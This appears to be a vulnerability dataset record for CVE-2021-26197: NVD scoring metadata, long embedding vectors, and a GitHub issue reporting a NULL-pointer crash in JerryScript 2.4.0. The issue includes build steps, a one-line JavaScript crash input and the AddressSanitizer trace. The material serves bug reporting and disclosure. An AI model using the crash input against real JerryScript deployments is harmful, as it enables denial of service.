0.009893551468849182, 0.014000874944031239, 0.0016545465914532542, -0.002004943322390318, 0.004534544423222542, 0.004665709100663662, -0.00526531832292676, 0.003354063956066966, -0.004793126136064529, -0.009331418201327324, 0.024434074759483337, 0.008731808513402939, -0.006625681649893522, 0.016399310901761055, -0.0013050868874415755, -0.025453411042690277, -0.01122768223285675, -0.0037400624714791775, 0.00408483762294054, -0.002366582630202174, -0.015934614464640617, 0.0029736869037151337, -0.005774985998868942, 0.013311324641108513, -0.0015955226263031363, -0.009039108641445637, -0.02462894842028618, -0.0019412348046898842, -0.009593747556209564, -0.004096080549061298, -0.005171629134565592, 0.000722810160368681, -0.006779331713914871, 0.016054537147283554, 0.018048236146569252, -0.013633614405989647, -0.00629214895889163, -0.006576963234692812, 0.019937006756663322, 0.00022848389926366508, -0.012771676294505596, -0.006565720774233341, -0.008724314160645008, 0.03285858407616615, 0.007431406527757645, 0.009623727761209011, 0.004077342338860035, 0.007663755211979151, 0.0199070256203413, -0.0037531787529587746, -0.019652191549539566, 0.020326752215623856, 0.013281343504786491, 0.01702890172600746, 0.004515806678682566, 0.009878561832010746, -0.00388996466062963, 0.020626556128263474, -0.004557029809802771, -0.0030224050860852003, 0.009736154228448868, -0.008589401841163635, 0.02653270773589611, -0.0007902662036940455, -5.27000281635992e-7, -0.03043016605079174, 0.0027188530657440424, 0.0174935981631279, -0.018617866560816765, 0.008102219551801682, 0.0024190484546124935, 0.006172227207571268, 0.002134233945980668, 0.025228556245565414, 0.013558663427829742, 0.010650558397173882, 0.003631383180618286, 0.00769748305901885, -0.03007040172815323, 0.004425865598022938, 0.015574849210679531, -0.0011139614507555962, -0.011954708024859428, -0.00777992932125926, 0.0008905133581720293, -0.01906757242977619, 0.008506955578923225, 0.022320453077554703, -0.017208784818649292, -0.0064420513808727264, -0.025588322430849075, -0.00010253083019051701, 0.01002096850425005, 0.003378423163667321, 0.016789058223366737, -0.012381929904222488, 0.001677031978033483, 0.013236372731626034, -0.014892793260514736, 0.005370249971747398, -0.0018185023218393326, 0.00611601397395134, 0.004354661796241999, -0.003622014308348298, -0.0035957815125584602, 0.00032135305809788406, -0.007468882016837597, 0.00514914421364665, -0.0051266588270664215, 0.022845109924674034, 0.003923692740499973, 0.024539006873965263, 0.009833591058850288, -0.005280308425426483, -0.01420324295759201, -0.02483881078660488, 0.020011957734823227, -0.017598530277609825, -0.0005176313570700586, -0.0002646712528076023, 0.022185539826750755, 0.006314634345471859, -0.007288999389857054, 0.018752777948975563, 0.011617428623139858, -0.009841086342930794, 0.0009846707107499242, -0.013888448476791382, 0.00722529087215662, 0.03960418701171875, -0.00798229780048132, 0.02002694644033909, 0.007431406527757645, -0.015754731371998787, -0.004388389643281698, -0.025198576971888542, -0.003395287087187171, -0.002675756113603711, -0.01149001158773899, 0.000510136247612536, 0.0013697323156520724, -0.0065619731321930885, 0.026262883096933365, 0.0035414418671280146, -0.005936130881309509, 0.0004993620095774531, 0.0034571217838674784, -0.0032997243106365204, 0.007277756463736296, 0.007689987774938345, -0.008686838671565056, 0.014420601539313793, -0.02040170319378376, -0.016099506989121437, 0.015439936891198158, -0.00032158728572539985, 0.0148778036236763, 0.0200419370085001, -0.007952316664159298, 0.016114497557282448, -0.008956662379205227, 0.026232901960611343, -0.0010755490511655807, -0.024089299142360687, -0.029141006991267204, 0.00034922550548799336, 0.003994896076619625, 0.009398873895406723, 0.009061594493687153, 0.004024876747280359, 0.0011626797495409846, 0.002812541788443923, 0.0012648006668314338, 0.0006544172065332532, -0.013101461343467236, -0.030370205640792847, 0.016069525852799416, 0.024868791922926903, -0.02686249278485775, 0.010005978867411613, -0.010440695099532604, -0.01684901863336563, -0.001325698453001678, 0.003007414983585477, 0.024598967283964157, -0.0009462582529522479, -0.0043246811255812645, -0.005928636062890291, -0.028976114466786385, -0.01358864363282919, -0.00547892926260829, -0.014488057233393192, 0.009548776783049107, 0.004796873778104782, 0.005538890138268471, -0.0016667261952534318, -0.003904954995959997, 0.002411553170531988, -0.009601241908967495, 0.004257225431501865, 0.012097115628421307, -0.009533786214888096, 0.015335005708038807, -0.017268745228648186, 0.00777992932125926, 0.02308495342731476, -0.02636781521141529, -0.0016011439729481936, 0.018123188987374306, -0.0038599842227995396, -0.008267112076282501, -0.01581469178199768, 0.003288481617346406, 0.01188725233078003, -0.00595112144947052, 0.00977362971752882, -0.029860537499189377, -0.006595700979232788, 0.013656099326908588, 0.01753856986761093, 0.02365458384156227, 0.011415060609579086, 0.0048530870117247105, 0.003487102221697569, -0.00985607597976923, 0.009908542037010193, 0.01851293444633484, 0.019787102937698364, -0.005816209129989147, -0.008357053622603416, 0.01054562721401453, 0.009968503378331661, 0.0013547419803217053, 0.016624165698885918, -0.020971331745386124, -0.03444754704833031, -0.004965513478964567, -0.015305024571716785, -0.002263524802401662, 0.006041062530130148, 0.008409518748521805, 0.0011055294889956713, 0.017463617026805878, -0.0009509426890872419, 0.0005864927661605179, 0.005677549634128809, 0.022335441783070564, 0.01734369620680809, 0.0031947926618158817, -0.0025558341294527054, 0.007862376049160957, 0.009061594493687153, 0.004631981253623962, -0.005849937442690134, -0.006007334683090448, 0.01798827573657036, -0.016354341059923172, -0.029785586521029472, -0.00446334108710289, 0.02564828284084797, -0.013326314277946949, 0.0010174618801102042, -0.020161859691143036, -0.004673204384744167, 0.010650558397173882, 0.01377602107822895, -0.008694333024322987, -0.01699892058968544, 0.0007335843984037638, 0.012629268690943718, 0.01173735037446022, -0.023669572547078133, -0.009661203250288963, -0.020281780511140823, 0.00747262965887785, -0.007007932756096125, -0.008289596997201443, 0.00408483762294054, -0.011917232535779476, 0.0025652030017226934, -0.019652191549539566, -0.009593747556209564, 0.010643063113093376, 0.03007040172815323, 0.01385846734046936, 0.002306621754541993, -0.00004581974644679576, 0.009436349384486675, -0.03285858407616615, -0.0008113462245091796, -0.000026935569621855393, 0.021840764209628105, 0.0010258938418701291, -0.010125900618731976, -0.016908979043364525, 0.01684901863336563, -0.01129513792693615, -0.0007420163601636887, -0.0012357571395114064, -0.01581469178199768, 0.01214958168566227, -0.0041223131120204926, -0.007862376049160957, -0.008506955578923225, 0.0032004141248762608, -0.0028518913313746452, 0.008304587565362453, 0.01992201618850231, 0.0010783596662804484, 0.012681734748184681, 0.003076744731515646, 0.001002471661195159, -0.004542039707303047, 0.004107323009520769, 0.013116450980305672, -0.014600483700633049, 0.02277015894651413, -0.0038637318648397923, -0.0005818083300255239, -0.008806760422885418, 0.0030430166516453028, 0.0014250087551772594, 0.01190224289894104, -0.0012039028806611896, 0.010373239405453205, -0.026637637987732887, 0.003976158332079649, 0.002332854550331831, -0.00025553657906129956, -0.02212557941675186, -0.03741561248898506, -0.008364547975361347, -0.005531394854187965, -0.0111227510496974, 0.012854122556746006, 0.013048995286226273, -0.02091137133538723, -0.02447904646396637, -0.010770480148494244, -0.0038637318648397923, 0.008791769854724407, 0.00642331363633275, 0.006711875554174185, 0.02107626385986805, 0.01816815882921219, 0.009616232477128506, 0.013026509433984756, -0.0007865186198614538, 0.002947453875094652, -0.013296334072947502, 0.007416416425257921, -0.013895942829549313, 0.008222141303122044, 0.007802414707839489, 0.02209559828042984, -0.007869870401918888, 0.019127532839775085, -0.0035695484839379787, -0.008079733699560165, -0.013281343504786491, 0.0028799979481846094, 0.006213450338691473, 0.023010002449154854, -0.013820991851389408, 0.0057637435384094715, -0.007067893631756306, 0.020446673035621643, -0.013101461343467236, -0.010485665872693062, -0.006333372090011835, 0.011152731254696846, 0.007405173499137163, 0.02890116348862648, 0.01299652922898531, -0.002508989768102765, 0.011265157721936703, 0.013288838788866997, -0.011827291920781136, 0.01454801857471466, 0.00752134807407856, 0.02567826397716999, 0.02292006090283394, 0.021870745345950127, -0.00023820412752684206, -0.012321969494223595, -0.000464228680357337, 0.01129513792693615, 0.006430808454751968, 0.0011401943629607558, 0.037655457854270935, -0.03585663065314293, -0.014900288544595242, 0.0035227041225880384, 0.019996967166662216, 0.000014624257346440572, -0.016084516420960426, -0.002018059603869915, -0.012291988357901573, -0.0007846448570489883, 0.04712928459048271, -0.005029221996665001, -0.005062950309365988, -0.009353903122246265, 0.01734369620680809, -0.004407127387821674, -0.04110321030020714, 0.01972714252769947, 0.00438089482486248, 0.026742570102214813, 0.015439936891198158, -0.004362157080322504, 0.002093010814860463, -0.00003387440665392205, -0.00085444311844185, 0.0017173181986436248, 0.010343258269131184, -0.013948408886790276, -0.007232786156237125, -0.007034165319055319, 0.018422992900013924, -0.004410875029861927, -0.001317266491241753, 0.008304587565362453, 0.0038168872706592083, 0.008724314160645008, -0.000007604906841152115, 0.006959214340895414, -0.025033684447407722, 0.003983653616160154, -0.001404397189617157, 0.017103852704167366, -0.020491644740104675, -0.0006544172065332532, -0.001450304756872356, -0.009039108641445637, -0.015349995344877243, 0.011100265197455883, 0.02143602818250656, 0.0064607891254127026, -0.019082562997937202, -0.004958018660545349, -0.012411910109221935, 0.011587447486817837, -0.005460191052407026, -0.0010080930078402162, -0.007408921141177416, 0.0015627314569428563, 0.02888617292046547, 0.011632418259978294, -0.004744407720863819, 0.01317641232162714, 0.0041747791692614555, 0.006974204443395138, -0.009571261703968048, 0.0033053457736968994, -0.012824141420423985, -0.0028237844817340374, 0.03159940615296364, -0.01223202794790268, 0.0153949661180377, 0.022305462509393692, -0.005849937442690134, 0.003904954995959997, -0.009541281498968601, -0.0045907581225037575, -0.018797747790813446, -0.006798069458454847, 0.01139257475733757, 0.0051266588270664215, 0.014360640197992325, -0.011505001224577427, -0.003001793520525098, -0.006861777976155281, 0.007660007569938898, -0.0008909818134270608, -0.005913645960390568, 0.002231670543551445, -0.011002828367054462, 0.01750858873128891, 0.011280148290097713, -0.009751144796609879, 0.005685044918209314, 0.004943028558045626, 0.025033684447407722, -0.0021829521283507347, -0.020281780511140823, 0.002720726653933525, 0.00015540652384515852, 0.006644419394433498, -0.007517600432038307, -0.020176850259304047, -0.028526408597826958, 0.011257662437856197, 0.0010193355847150087, 0.00047945312689989805, -0.024778850376605988, -0.00010440460755489767, 0.011002828367054462, -0.020941350609064102, 0.022200530394911766, 0.0055913557298481464, 0.008177170529961586, 0.010395724326372147, -0.018617866560816765, 0.026967423036694527, -0.009683688171207905, 0.0014212612295523286, 0.02055160515010357, -0.019996967166662216, -0.011167720891535282, -0.01231447421014309, -0.0050741927698254585, 0.005748753435909748, -0.009533786214888096, -0.016594184562563896, -0.0073002418503165245, -0.04883816838264465, 0.00730773713439703, -0.0021286127157509327, 0.01701391115784645, 0.0037250721361488104, 0.03041517734527588, -0.005692539736628532, 0.01137758418917656, 0.0033072195947170258, 0.010905392467975616, 0.00030776814674027264, 0.007914841175079346, -0.018602875992655754, 0.0019243707647547126, 0.010815450921654701, -0.01617445796728134, -0.014840328134596348, 0.05048709362745285, 0.011624922975897789, 0.015934614464640617, 0.018273090943694115, -0.0063483621925115585, 0.011032809503376484, 0.008754294365644455, -0.0298905186355114, -0.017448628321290016, 0.010665548965334892, 0.0022447870578616858, -0.00977362971752882, 0.02483881078660488, -0.02348969131708145, 0.01301151979714632, -0.009743649512529373, -0.012681734748184681, -0.0003991148842032999, -0.01956225000321865, -0.012411910109221935, -0.004695689771324396, -0.005876170005649328, 0.01837802119553089, -0.008821750059723854, -0.0038599842227995396, 0.008267112076282501, -0.012007174082100391, 0.004043614491820335, 0.0067231180146336555, -0.028526408597826958, 0.014592989347875118, -0.007809909991919994, 0.0049130478873848915, 0.019847065210342407, 0.005587608087807894, 0.01906757242977619, 0.012217037379741669, 0.019592231139540672, -0.008117209188640118, -0.01453302800655365, -0.01596459560096264, 0.006554477848112583, 0.003830003784969449, -0.005482676438987255, 0.0174935981631279, -0.010995334014296532, 0.015320015139877796, -0.004583262838423252, -0.00798229780048132, 0.0009392315987497568, 0.014982734806835651, 0.0006961087929084897, -0.01010341476649046, 0.021555950865149498, -0.012134591117501259, -0.00568879209458828, 0.005411473102867603, -0.007154087070375681, -0.010912887752056122, -0.01342375110834837, -0.00007014959555817768, -0.011497506871819496, -0.021121233701705933, 0.00034547795075923204, -0.011220186948776245, -0.009039108641445637, 0.02585814706981182, 0.01578471250832081, -0.02636781521141529, 0.016039546579122543, -0.008177170529961586, -0.0020274287089705467, -0.006771836429834366, -0.004871824756264687, -0.03327830880880356, -0.02720726653933525, 0.011010323651134968, -0.00798229780048132, -0.019966986030340195, -0.003260375000536442, -0.014600483700633049, -0.008229636587202549, -0.007772434037178755, -0.006711875554174185, -0.01696893945336342, -0.006168479565531015, -0.009601241908967495, -0.003848741529509425, -0.009451339952647686, 0.025618303567171097, 0.00255021289922297, 0.009901046752929688, -0.019412348046898842, 0.007637522183358669, -0.00017133363871835172, -0.014652949757874012, 0.0037588002160191536, 0.002156719332560897, 0.003644499694928527, 0.010313278064131737, 0.002634532982483506, 0.03549686446785927, -0.016294380649924278, 0.0005996092222630978, -0.003691344056278467, -0.012104610912501812, -0.022530315443873405, -0.018422992900013924, -0.010673043318092823, -0.007019175216555595, 0.021211175248026848, 0.017058880999684334, -0.010733004659414291, 0.000856785336509347, 0.0029830557759851217, -0.001819439115934074, 0.00816967524588108, 0.015349995344877243, 0.008424509316682816, -0.009391379542648792, 0.010260812006890774, -0.007600046694278717, 0.02872128039598465, 0.012104610912501812, 0.008192161098122597, -0.007847385480999947, 0.021031292155385017, 0.0016114497557282448, 0.005906150676310062, 0.019172504544258118, -0.0035695484839379787, -0.015844672918319702, 0.013746040873229504, 0.018048236146569252, 0.0033147146459668875, 0.006445799022912979, -0.014787862077355385, 0.02178080379962921, 0.020191838964819908, 0.007742453832179308, -0.009039108641445637, 0.056842952966690063, -0.003998643718659878, -0.012441891245543957, 0.008656857535243034, 0.00717657245695591, -0.017643500119447708, -0.015087666921317577, -0.005520152393728495, -0.026097990572452545, 0.011857272125780582, 0.0035639272537082434, 0.016893988475203514, 0.0019880791660398245, 0.0018672205042093992, 0.01334130484610796, 0.02584315650165081, 0.0038037707563489676, -0.011624922975897789, 0.010088425129652023, -0.015889644622802734, -0.0052353376522660255, -0.013880953192710876, 0.010755489580333233, 0.009451339952647686, 0.0052353376522660255, -0.00789985153824091, -0.004868077114224434, 0.0026532707270234823, -0.0023778253234922886, -0.008941671811044216, 0.00028504859074018896, 0.006056053098291159, -0.011954708024859428, 0.018303070217370987, 0.01665414497256279, 0.0009902920573949814, 0.007525095250457525, 0.020971331745386124, -0.0006164732039906085, 0.017268745228648186, 0.007734958548098803, -0.009781125001609325, 0.01731371507048607, 0.0398140512406826, 0.006509507540613413, -0.013416255824267864, -0.022305462509393692, -0.00013760563160758466, 0.004879320040345192, 0.0034121510107070208, -0.01292907353490591, 0.011025314219295979, -0.005565122701227665, -0.00611601397395134, 0.024928752332925797, 0.03840496763586998, 0.0016133234603330493, 0.008611886762082577, 0.016714107245206833, -0.0002456992515362799, -0.014742891304194927, -0.005366502329707146, 0.02247035503387451 ]
312
CVE-2021-26197
2021-06-10T23:15:08.403000
An issue was discovered in JerryScript 2.4.0. There is a SEGV in main_print_unhandled_exception in main-utils.c file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4403" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "1E97C345-3992-457E-928D-05A0B97B2A5F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/4403
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision 2faafa4 ###### Build platform Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --builddir=$PWD/build ``` ###### Test case ``` throw new SyntaxError("[0: 98, 1: 54, 8: false, 10: 21, foo: bar]"); ``` ###### Output ``` Error: Failed to open file: 0 ASAN:DEADLYSIGNAL ================================================================= ==13994==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000 (pc 0x5678dd4b bp 0xffca4f88 sp 0xffca4d10 T0) ==13994==The signal is caused by a READ memory access. ==13994==Hint: address points to the zero page. #0 0x5678dd4a in main_print_unhandled_exception /root/jerryscript/jerry-main/main-utils.c:341 #1 0x5678baae in main /root/jerryscript/jerry-main/main-unix.c:140 #2 0xf7760f20 in __libc_start_main (/lib32/libc.so.6+0x18f20) #3 0x5662c3d0 (/root/jerryscript/build/bin/jerry+0x1d3d0) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /root/jerryscript/jerry-main/main-utils.c:341 in main_print_unhandled_exception ==13994==ABORTING ``` Credits: Found by chong from OWL337.
SEGV in main_print_unhandled_exception
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4403/comments
0
2021-01-02T14:31:59
2021-01-08T15:03:34Z
https://github.com/jerryscript-project/jerryscript/issues/4403
777,469,465
4,403
true
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : SEGV in main_print_unhandled_exception Issue date: --- start body --- ###### JerryScript revision 2faafa4 ###### Build platform Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --builddir=$PWD/build ``` ###### Test case ``` throw new SyntaxError("[0: 98, 1: 54, 8: false, 10: 21, foo: bar]"); ``` ###### Output ``` Error: Failed to open file: 0 ASAN:DEADLYSIGNAL ================================================================= ==13994==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000 (pc 0x5678dd4b bp 0xffca4f88 sp 0xffca4d10 T0) ==13994==The signal is caused by a READ memory access. ==13994==Hint: address points to the zero page. #0 0x5678dd4a in main_print_unhandled_exception /root/jerryscript/jerry-main/main-utils.c:341 #1 0x5678baae in main /root/jerryscript/jerry-main/main-unix.c:140 #2 0xf7760f20 in __libc_start_main (/lib32/libc.so.6+0x18f20) #3 0x5662c3d0 (/root/jerryscript/build/bin/jerry+0x1d3d0) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /root/jerryscript/jerry-main/main-utils.c:341 in main_print_unhandled_exception ==13994==ABORTING ``` Credits: Found by chong from OWL337. --- end body ---
1,622
[ -0.01165247242897749, 0.00813268218189478, -0.0038732264656573534, 0.005057421047240496, 0.02945546805858612, -0.013809528201818466, -0.032997120171785355, 0.05048676207661629, -0.03261817991733551, 0.014232194982469082, -0.027764802798628807, 0.0270652174949646, 0.021206188946962357, 0.010173141025006771, 0.035212475806474686, 0.028639284893870354, -0.036407601088285446, 0.002823848044499755, -0.04019702225923538, -0.015580354258418083, 0.03911849483847618, 0.007571556605398655, -0.036407601088285446, 0.027444159612059593, 0.004033548291772604, 0.006208822131156921, -0.03051942214369774, 0.014203045517206192, -0.01735846698284149, 0.006584120914340019, -0.030752617865800858, 0.0036163474433124065, -0.013816815800964832, 0.012271897867321968, 0.046230949461460114, 0.011251668445765972, 0.009029027074575424, 0.04535646736621857, 0.009852496907114983, -0.009473554790019989, 0.010122128762304783, -0.01990904100239277, -0.027210965752601624, 0.020608626306056976, 0.0029659513384103775, 0.04270387068390846, 0.02648223005235195, -0.00551288016140461, -0.06704361736774445, 0.02336324378848076, 0.011965828947722912, -0.01222088560461998, -0.009750474244356155, -0.06319589912891388, 0.015638653188943863, -0.012505092658102512, 0.023946231231093407, 0.0035288992803543806, 0.009109187871217728, 0.024354323744773865, 0.0020204177126288414, -0.013882401399314404, -0.01676090434193611, 0.004820581991225481, 0.021803751587867737, 0.05981456860899925, -0.009641163982450962, 0.0018154610879719257, 0.02397538162767887, 0.010289737954735756, 0.005312478169798851, -0.007833900861442089, 0.04282046854496002, 0.029353445395827293, -0.004933536052703857, -0.006092224735766649, 0.005112076178193092, 0.03212263807654381, -0.016250791028141975, -0.030140480026602745, -0.013088081032037735, 0.006114086601883173, -0.013845965266227722, -0.0011258955346420407, -0.003474244149401784, -0.018932534381747246, -0.008810406550765038, -0.0726403072476387, -0.004059053957462311, -0.019413501024246216, 0.005611259490251541, 0.04270387068390846, -0.007418522145599127, 0.01099661085754633, 0.013962562195956707, 0.0009136514854617417, -0.02808544598519802, 0.0068355342373251915, -0.03862295672297478, 0.011630610562860966, 0.009939945302903652, 0.0008148167980834842, -0.024937311187386513, -0.01645483635365963, -0.007702728733420372, 0.05611259490251541, 0.004339616745710373, -0.009174773469567299, 0.06092224642634392, 0.10313057899475098, 0.010982036590576172, -0.012833023443818092, -0.013029782101511955, -0.057919856160879135, -0.006828247103840113, 0.009670313447713852, 0.017023250460624695, -0.019413501024246216, -0.028726734220981598, 0.0006435640971176326, -0.0303445253521204, 0.009488129988312721, -0.03404650092124939, -0.03381330519914627, -0.020608626306056976, 0.02837694063782692, 0.035095877945423126, -0.010807139798998833, 0.01728559471666813, -0.011397415772080421, -0.05885263904929161, -0.0327930748462677, 0.006646063178777695, -0.014407090842723846, 0.002856641309335828, -0.011193369515240192, -0.023173773661255836, 0.026744574308395386, -0.005399926565587521, -0.04515242204070091, -0.05115719884634018, -0.0018947110511362553, 0.020462878048419952, -0.010683255270123482, -0.01514311321079731, 0.0019457224989309907, -0.020972993224859238, 0.010756128467619419, -0.029178548604249954, -0.026205310598015785, -0.018334971740841866, 0.013641919009387493, 0.01061038114130497, 0.01948637329041958, 0.026861172169446945, 0.0032592671923339367, -0.008234705775976181, 0.03457118943333626, 0.014254056848585606, -0.008730245754122734, -0.0218766238540411, -0.034600336104631424, -0.00891971681267023, -0.0009127405937761068, -0.02933887019753456, 0.01616334170103073, -0.0012953265104442835, -0.010960174724459648, -0.0037712035700678825, 0.021555980667471886, -0.026555104181170464, 0.0011805506655946374, 0.011426565237343311, 0.02330494485795498, -0.06086394563317299, 0.008205556310713291, 0.021381085738539696, 0.023931657895445824, -0.007513257674872875, -0.01692122593522072, 0.012563391588628292, 0.012104288674890995, -0.009240359999239445, -0.007272775284945965, 0.002406647428870201, -0.04728032648563385, 0.01853901892900467, -0.02910567633807659, 0.017751984298229218, -0.030257077887654305, 0.0014674901030957699, -0.015959296375513077, 0.0020914694759994745, -0.020200533792376518, 0.03760272637009621, 0.017693685367703438, -0.017664536833763123, -0.04701798036694527, -0.016979524865746498, -0.0008038858068175614, 0.02737128734588623, -0.0018546305363997817, -0.0289745032787323, -0.0333760641515255, 0.0021679867058992386, -0.013058931566774845, -0.014093735255300999, 0.0023082681000232697, -0.004051766823977232, 0.007870337925851345, -0.000531065627001226, 0.006733511574566364, 0.005265110172331333, -0.0298052616417408, -0.0020659638103097677, 0.0010512002045288682, 0.030956663191318512, 0.018917961046099663, -0.04174194112420082, -0.020302556455135345, 0.02664255164563656, 0.007928636856377125, -0.02301345206797123, 0.012461368925869465, -0.05975627154111862, -0.020302556455135345, -0.027458734810352325, 0.008890567347407341, -0.029674088582396507, 0.008118107914924622, 0.011463001370429993, -0.01728559471666813, -0.01579897478222847, 0.002590653020888567, 0.03483353182673454, 0.02135193534195423, -0.017956029623746872, -0.015434606932103634, 0.012446793727576733, 0.001249780529178679, -0.009961807169020176, -0.009859784506261349, -0.05998946353793144, -0.029411744326353073, 0.03046112321317196, 0.03780677169561386, -0.03996382653713226, -0.02004021219909191, 0.004510869737714529, 0.0022080671042203903, 0.00799422338604927, -0.025185082107782364, 0.006423798855394125, -0.02366931363940239, -0.011973115615546703, 0.009670313447713852, 0.013284838758409023, 0.02145395800471306, 0.001659694011323154, 0.012148012407124043, 0.01896168477833271, 0.005079282913357019, -0.036407601088285446, 0.01254881639033556, 0.042849618941545486, 0.010595806874334812, -0.04515242204070091, 0.0004909852286800742, 0.007520545274019241, -0.003778490936383605, 0.042179182171821594, -0.05975627154111862, -0.019661270081996918, 0.008497050032019615, -0.012133438140153885, -0.01955924741923809, 0.042966216802597046, 0.03392990306019783, -0.01004196796566248, 0.004456214606761932, 0.004842443857342005, 0.008628222160041332, 0.02039000578224659, 0.015696952119469643, 0.03238498419523239, -0.0003427331685088575, 0.040517665445804596, -0.01579897478222847, -0.00749868294224143, -0.0281437449157238, 0.0005032825865782797, -0.027079792693257332, -0.0246166680008173, 0.018874237313866615, 0.03497928008437157, 0.003701973706483841, 0.008868704549968243, -0.01499736588448286, -0.0027272908482700586, 0.004846087656915188, 0.0016678922111168504, -0.04392814636230469, 0.0009710394078865647, 0.01674633100628853, -0.03177284449338913, 0.008810406550765038, 0.007841188460588455, 0.006995855830609798, -0.011200657114386559, -0.01039904821664095, 0.061738427728414536, -0.036407601088285446, -0.010384473949670792, -0.012920471839606762, -0.012286472134292126, 0.0013344959588721395, 0.05127379298210144, -0.009284083731472492, -0.020244257524609566, 0.004616536200046539, -0.017795708030462265, -0.035095877945423126, -0.04687223583459854, -0.002228107303380966, 0.03148135170340538, -0.0033649338874965906, -0.04334515705704689, 0.03981808200478554, -0.03923509269952774, 0.008970728144049644, 0.019821591675281525, -0.04521071910858154, -0.029047377407550812, -0.00452908780425787, -0.042120881378650665, -0.012111575342714787, -0.03142305463552475, 0.027750229462981224, 0.04454028233885765, -0.027473310008645058, -0.023625588044524193, 0.012352058663964272, -0.026074137538671494, -0.0007150712190195918, -0.02987813577055931, -0.014982791617512703, -0.00472220266237855, 0.028989078477025032, 0.01651313528418541, 0.02737128734588623, 0.0009382463176734746, 0.009670313447713852, 0.015769826248288155, 0.00022829901718068868, 0.03713633492588997, -0.038360610604286194, -0.0655861496925354, -0.012322909198701382, 0.012417644262313843, -0.003538008313626051, 0.010675967670977116, -0.021774601191282272, -0.005797086749225855, 0.011368266306817532, 0.029295146465301514, 0.006449304521083832, 0.0035234338138252497, -0.027633631601929665, -0.04489007592201233, -0.019282327964901924, -0.00534891476854682, 0.015594929456710815, 0.008773969486355782, -0.01269456371665001, -0.002330130198970437, -0.0355331189930439, 0.007323786616325378, 0.011543162167072296, -0.02563689649105072, 0.006445661187171936, 0.006157810799777508, -0.0050865705125033855, -0.00663148844614625, -0.0377776212990284, 0.024164851754903793, 0.005760650150477886, -0.014530976302921772, 0.0388561487197876, -0.004496295005083084, 0.005971983540803194, -0.008875992149114609, 0.038010817021131516, -0.042062584310770035, -0.035445671528577805, -0.0033940833527594805, -0.005403569899499416, -0.007943211123347282, -0.0007947765989229083, 0.0333760641515255, -0.01329212635755539, -0.008314866572618484, -0.022867703810334206, 0.01585727371275425, -0.03952658548951149, 0.002634376985952258, 0.005822592880576849, 0.003782134735956788, -0.05497576668858528, 0.015347159467637539, 0.0014656683197245002, 0.04008042439818382, -0.02783767692744732, -0.0011923926649615169, 0.00829300470650196, 0.03477523475885391, 0.017256444320082664, 0.01260711532086134, -0.033900752663612366, -0.04016787186264992, 0.008183694444596767, -0.0284352395683527, -0.019836166873574257, 0.026759149506688118, 0.01439980324357748, -0.008402314968407154, 0.004667547531425953, -0.01657143421471119, 0.029965583235025406, 0.015099389478564262, -0.023538140580058098, -0.04789246246218681, -0.002891256008297205, 0.019224029034376144, 0.06511975824832916, 0.008722958154976368, -0.03206434100866318, -0.007061442360281944, -0.04168364033102989, -0.014939067885279655, 0.0020823602098971605, 0.011674334295094013, 0.01263626478612423, -0.040750861167907715, -0.037223782390356064, -0.010464634746313095, -0.007768315263092518, -0.042674720287323, -0.013671068474650383, 0.005090213846415281, -0.0024485494941473007, 0.01849529519677162, 0.04290791600942612, 0.0016997744096443057, -0.008373165503144264, 0.021002143621444702, 0.0035963072441518307, -0.02396080642938614, 0.008650084026157856, 0.005352558568120003, 0.011156932450830936, 0.0026125148870050907, -0.004984547384083271, 0.0030151410028338432, 0.0027801240794360638, -0.05095314979553223, 0.040459368377923965, -0.00022989312128629535, -0.012526954524219036, -0.0020386362448334694, -0.022255567833781242, 0.04908759146928787, 0.00026598828844726086, 0.03838976100087166, -0.0003459214058239013, -0.015070240013301373, -0.010544795542955399, -0.007666292134672403, -0.004995478317141533, -0.007010430563241243, -0.033784154802560806, 0.008890567347407341, -0.0028821469750255346, -0.03940998762845993, 0.03267647698521614, 